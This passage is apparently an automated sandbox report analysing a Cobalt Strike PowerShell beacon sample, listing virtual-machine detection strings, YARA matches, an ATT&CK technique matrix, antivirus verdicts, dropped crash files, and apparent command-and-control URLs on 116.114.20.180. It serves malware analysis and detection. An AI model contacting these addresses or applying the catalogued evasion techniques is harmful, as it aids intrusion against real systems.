            Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.6.drBinary or memory string: VMware20,1
            Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2212874525.000001F467640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: TS-240622-CobaltStrike5.ps1, type: SAMPLE
            Source: Yara matchFile source: amsi64_2276.amsi.csv, type: OTHER
            Source: Yara matchFile source: 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            1
            Process Injection
            21
            Virtualization/Sandbox Evasion
            OS Credential Dumping11
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Obfuscated Files or Information
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Software Packing
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            File and Directory Discovery
            SSHKeylogging111
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            TS-240622-CobaltStrike5.ps173%ReversingLabsScript-PowerShell.Trojan.CobaltStrikeBeacon
            TS-240622-CobaltStrike5.ps155%VirustotalBrowse
            TS-240622-CobaltStrike5.ps1100%AviraTR/Coblat.G1
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://116.114.20.180/845-40f1-ac21-573d1d5ce43fL/AD0%Avira URL Cloudsafe
            http://116.114.20.180:8088/aaPK0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://116.114.20.180/aaPK0%Avira URL Cloudsafe
            http://116.114.20.180:8088/aaPKxeoc0%Avira URL Cloudsafe
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://116.114.20.180:8088/aaPKtrue
            • Avira URL Cloud: safe
            unknown
            http://116.114.20.180/aaPKtrue
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2208242790.000001F45F480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2192509585.000001F44F7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F467460000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F467460000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://116.114.20.180/845-40f1-ac21-573d1d5ce43fL/ADpowershell.exe, 00000000.00000002.2213129020.000001F46781A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://go.micropowershell.exe, 00000000.00000002.2192509585.000001F450407000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://contoso.com/powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2208242790.000001F45F480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2192509585.000001F44F7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000000.00000002.2208242790.000001F45F33E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://upx.sf.netAmcache.hve.6.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://aka.ms/pscore68powershell.exe, 00000000.00000002.2192509585.000001F44F2D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2192509585.000001F44F2D1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2192509585.000001F44F503000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2211751042.000001F467460000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://116.114.20.180:8088/aaPKxeocpowershell.exe, 00000000.00000002.2192073706.000001F44D402000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            116.114.20.180
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1461070
            Start date and time:2024-06-22 10:16:08 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 27s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:12
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:TS-240622-CobaltStrike5.ps1
            Detection:MAL
            Classification:mal100.troj.evad.winPS1@3/9@0/1
            EGA Information:Failed
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .ps1
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 104.208.16.94
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
            • Execution Graph export aborted for target powershell.exe, PID 2276 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtSetInformationFile calls found.
            TimeTypeDescription
            04:16:59API Interceptor28x Sleep call for process: powershell.exe modified
            04:17:05API Interceptor1x Sleep call for process: WerFault.exe modified
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CHINA169-BACKBONECHINAUNICOMChina169BackboneCNCB8drrx7FQ.elfGet hashmaliciousMirai, MoobotBrowse
            • 27.205.186.127
            http://818xg.chumeng.link/Get hashmaliciousUnknownBrowse
            • 218.60.21.9
            KMtvig5fAT.elfGet hashmaliciousMiraiBrowse
            • 113.224.77.79
            3RzVV7rQr8.elfGet hashmaliciousMiraiBrowse
            • 123.157.211.234
            6vokwEQb7K.elfGet hashmaliciousMiraiBrowse
            • 101.25.171.159
            Zmtl2jXJ68.elfGet hashmaliciousMiraiBrowse
            • 120.1.84.133
            iazK5m3L51.elfGet hashmaliciousMiraiBrowse
            • 157.10.154.152
            acLghFWq0Z.elfGet hashmaliciousMiraiBrowse
            • 61.162.52.205
            i82HF8QQwf.elfGet hashmaliciousMiraiBrowse
            • 175.163.197.27
            PTT quotation form.exeGet hashmaliciousFormBookBrowse
            • 123.58.214.101
            No context
            No context
            Process:C:\Windows\System32\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):1.5263647969894585
            Encrypted:false
            SSDEEP:192:NkmmGYx0I3D8jaVMb1F2GlJTzuiFgZ24lO8b:qpGYyI3D8jd1F2QJTzuiFgY4lO8b
            MD5:5EF86DF26169C3E843CF6BE5401882BF
            SHA1:ADDF380264F0F6E455A0F7BF96F1CB02867691AE
            SHA-256:2B24E11D3267B32E5B4227E5365EE3B2F30B5940FE2D6562F3321C6D32FA58C4
            SHA-512:06CD2B8BEBF0BE34AD680CE5802775D3B4A509696E57822DCB55B2DCDFAB813A2E2DC24529D75CC4D75F37690155D97D6E282083076889E81EEB452B7CA6A828
            Malicious:false
            Reputation:low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.5.1.7.8.2.2.5.9.2.4.0.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.5.1.7.8.2.3.5.2.9.9.1.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.3.0.a.7.8.e.-.9.9.9.3.-.4.2.2.b.-.9.c.5.7.-.a.1.e.a.2.8.a.f.b.4.8.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.e.3.9.a.7.f.-.a.8.6.4.-.4.6.0.e.-.a.1.5.5.-.d.5.b.e.d.e.8.0.c.9.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.e.4.-.0.0.0.1.-.0.0.1.5.-.e.f.2.1.-.5.2.8.c.7.c.c.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.
            Process:C:\Windows\System32\WerFault.exe
            File Type:Mini DuMP crash report, 15 streams, Sat Jun 22 08:17:03 2024, 0x1205a4 type
            Category:dropped
            Size (bytes):775503
            Entropy (8bit):3.193866943485767
            Encrypted:false
            SSDEEP:6144:PIkMc7SHm8riqlm3QpHYbZBWE5pwaSggr7EFW:ZSeqMQp49BWndggnEFW
            MD5:BD1B3F5995A2B718552197167ECA40A1
            SHA1:E1978775990CF2F7565F98C4AE3C0601B085D54C
            SHA-256:D57EB538D627F5F97586C2DCC8FED49055EAF02B4CD8764A24276F3FA53BD934
            SHA-512:26B6C21AC2FF560CA0F82C110752B3270177719623720E2526A333D9C042C522D42B0BB19E4BF8F30C4480A1A61DDB09888C586A5876BE947CC708E2A47A459E
            Malicious:false
            Yara Hits:
            • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmp, Author: unknown
            • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAA7.tmp.dmp, Author: unknown
            Reputation:low
            Preview:MDMP..a..... .........vf............T............+..h...........t6......4...|...........`.......8...........T...........0l...i..........pH..........\J..............................................................................eJ.......J......Lw......................T...........y.vf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\System32\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8814
            Entropy (8bit):3.7002447590543777
            Encrypted:false
            SSDEEP:192:R6l7wVeJRJ3Ung6Y2D6EpP6gmfMQVpD+89bND5fyvm:R6lXJP3Ug6YEpP6gmfMQXNdfT
            MD5:8A58A96CC334BCC7730D1093A8D2ECEE
            SHA1:4B28BC16087358DB7661A12117EB0AE8ACC03A07
            SHA-256:10BF3D237C354094C9A624688E3E31A06E0BFA13FDA307FC9017E9D078FA5CEC
            SHA-512:9320509C8C06E9C00AF528D7A8F56BD9E8F741744D05CDF929506255BDC04C1283CFAA10E8F5A6C513BC64882A7E2906F98446EE9223D2452DF2814732F3D20B
            Malicious:false
            Reputation:low
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.7.6.<./.P.i.
            Process:C:\Windows\System32\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4764
            Entropy (8bit):4.4840299494972955
            Encrypted:false
            SSDEEP:48:cvIwWl8zsoxJg771I9F6WpW8VYxYm8M4JQ9rOKFBgyq85q+OXytfQd:uIjfUI7a77VtJQNVgC0ufQd
            MD5:B64F1D4A4C24A5BF6318A8968F46CB6E
            SHA1:95A282B6C0A44E9BA087E4611B005162E5F8DCD0
            SHA-256:8A21E101883B9F586EDCF47BA80C83C573DAFFE51801D1E7B7E2FCD2270FE4A9
            SHA-512:BA7CE29515D7F3CF2772F5DFC23D1D5D6C71BDC10F71553BA0BE44B996B27143E3BDFE6543D3BCE8EDB3A11D0022CA9ABC85F173BAAECFAFEE0DF88CEB0F9981
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="378679" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):6224
            Entropy (8bit):3.7386824692687837
            Encrypted:false
            SSDEEP:48:wrDNljt1m3CypU2UMIQukvhkvklCyw3ljUP/NlHJs8SogZo+lc0P/Nlws8SogZoz:cbm3CRT3kvhkvCCtVYP/NCHThP/NFHTK
            MD5:E5856814275B437A5107C05C4E374973
            SHA1:E8219E28803987F259EE0BA05DBF82C75211B931
            SHA-256:C40432D3F00B4E5E5C5BD03F9351401579D958B2CF0AC33F2E9237CD4C1B361C
            SHA-512:7576E4440B8303896B6FCCC72BAA99B692FCBE527431839D87E71042CDF0C696D6E6B7589AD4278CDC10C2A6B3B5DE32729DDA569DE24EB384A14B9E280D1D56
            Malicious:false
            Reputation:low
            Preview:...................................FL..................F.".. ...J.S...6.h.|...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...,'..|.....s.|.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.B...........................^.A.p.p.D.a.t.a...B.V.1......X.B..Roaming.@......EW<2.X.B..../.....................A...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.X.B....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.X.B....2......................Z..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.X.B....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.X.B....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X.B....u...........
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):6224
            Entropy (8bit):3.7386824692687837
            Encrypted:false
            SSDEEP:48:wrDNljt1m3CypU2UMIQukvhkvklCyw3ljUP/NlHJs8SogZo+lc0P/Nlws8SogZoz:cbm3CRT3kvhkvCCtVYP/NCHThP/NFHTK
            MD5:E5856814275B437A5107C05C4E374973
            SHA1:E8219E28803987F259EE0BA05DBF82C75211B931
            SHA-256:C40432D3F00B4E5E5C5BD03F9351401579D958B2CF0AC33F2E9237CD4C1B361C
            SHA-512:7576E4440B8303896B6FCCC72BAA99B692FCBE527431839D87E71042CDF0C696D6E6B7589AD4278CDC10C2A6B3B5DE32729DDA569DE24EB384A14B9E280D1D56
            Malicious:false
            Reputation:low
